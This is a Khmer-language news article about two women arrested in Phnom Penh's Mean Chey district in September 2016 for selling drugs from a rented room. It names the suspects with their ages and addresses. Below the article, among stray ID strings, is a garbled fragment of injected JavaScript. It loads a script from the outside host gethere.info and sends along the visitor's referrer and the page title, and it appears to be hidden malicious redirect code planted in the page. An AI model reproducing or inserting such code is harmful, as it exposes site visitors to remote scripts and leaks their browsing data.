ស្រ្ដី ២ នាក់រួមជាមួយថ្នាំញៀន ៦ កញ្ចប់តូចត្រូវបានសម្ថកិច្ចខណ្ឌមានជ័យឃាត់ខ្លួនខណៈកំពុងអង្គុយលក់នៅបន្ទប់ជួល

ភ្នំពេញ៖ ស្រ្ដី ២ នាក់រួមជាមួយថ្នាំញៀន ៦ កញ្ចប់តូចត្រូវបានសម្ថកិច្ចខណ្ឌមានជ័យឃាត់ខ្លួនខណៈកំពុងអង្គុយលក់នៅបន្ទប់ជួល។ កិច្ចប្រត្តិបត្ដិការណ៍នេះចុះបង្គ្រាបកាលពីវេលាម៉ោង ១២ នឹង ៣០ នាទី ថ្ងៃទី ៦ ខែ កញ្ញា ឆ្នាំ ២០១៦ ស្ថិតនៅក្នុងភូមិដំណាក់ធំ សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ ដឹកនាំកម្លាំងដោយលោក ហួរ ម៉េងវ៉ាង អធិការរងខណ្ឌមានជ័យ ក្រោមការបញ្ជារបស់លោក តេង ស៊ីណូ អធិការខណ្ឌមានជ័យ។ ជនសង្ស័យទី ១ ឈ្មោះ ធឹម យឿម ភេទស្រី អាយុ ៣៤ មុខរបរមិនពិតប្រាកដ ស្នាក់នៅសង្កាត់បឹងទំពុន សណ្ឌមានជ័យ ហើយមានស្រុកកំណើតនៅ ភូមិវិហាសួរ ស្រុកខ្សច់កណ្ដាល ខេត្តកណ្ដាល។ ជនសង្ស័យទី ២ ឈ្មោះ អ៊ំ ណាគ្រី ភេទស្រី អាយុ ៥៤ ឆ្នាំមុខរបរមិនពិតប្រាកដ ស្នាក់នៅភូមិដំណាក់ធំ សង្កាត់ស្ទឹងមានជ័យខណ្ឌមានជ័យ។ បើតាមការបញ្ជាក់ពីលោកអធិការរង ហួរ ម៉េងវ៉ាង បានអោយដឹងថាក្រោយពីសើបអង្កេតដឹងថាស្ដ្រីទាំង ២នាក់ខាងលើជាអ្នកជួញដូរនូវសារធាតុញៀន លោកបានដាក់កម្លាំងហើយឃាត់ខ្លួនបាននូវស្ដ្រី ទាំង២នាក់បាននៅនឹងបន្ទប់ផ្ទះជួលរបស់ខ្លួនតែម្ដង។ ក្រោយពេលឃាត់ខ្លួនជនសង្ស័យទាំង ២ នាក់ត្រូវបានសមត្ថកិច្ចយកមកសួរនាំនូវប៉ុស្ដិ៍នគរបាលរដ្ឋបាលស្ទឹងមានជ័យ ដើម្បីកសាងសំណុំរឿងបញ្ជូនទៅកាន់អធិការដ្ឋាននគរបាលខណ្ឌមានជ័យដើម្បីកាត់ទោសតាមនិតិវិធីច្បាប់។ ដោយ អាត ចន្ធូ

9e2b0a56-837d-4259-a040-9d324fb57a04 654f1f08-71ef-4828-9afc-35941b70519c d99afbd5-9b86-4ee8-b25d-2eff3d8932a4s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More